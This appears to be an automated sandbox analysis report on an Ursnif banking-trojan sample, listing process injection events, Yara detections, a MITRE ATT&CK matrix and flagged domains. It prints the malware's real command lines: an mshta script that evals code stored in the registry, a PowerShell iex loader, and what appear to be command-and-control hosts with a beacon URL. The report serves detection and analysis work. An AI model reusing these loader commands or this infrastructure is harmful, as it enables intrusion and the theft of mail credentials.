Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 24C0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 9E8000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 3100000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: unknown
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 4660
Source: C:\Windows\explorer.exe	Thread register set: target process: 6188

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 24C0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 9E8000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 3100000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 27FF7160000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 738687B000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2177000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9B6E3C8000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 0000001E.00000002.911824864.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\control.exe

Code function: 25_2_00B9C164 CreateMutexExA,GetUserNameA,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Process Injection812	Scripting121	Credential API Hooking3	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting121	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Security Account Manager	System Information Discovery126	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell1	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Security Software Discovery341	SSH	Keylogging	Data Transfer Size Limits	Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion5	Cached Domain Credentials	Virtualization/Sandbox Evasion5	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\marginal.roq	100%	Avira	TR/Crypt.XDR.Gen
C:\Users\user\AppData\Local\Temp\marginal.roq	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\marginal.roq	69%	ReversingLabs	Win32.Trojan.Razy

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
c56.lepini.at	12%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	12%	Virustotal	Browse
222.222.67.208.in-addr.arpa	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://c56.lepini.at/s	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
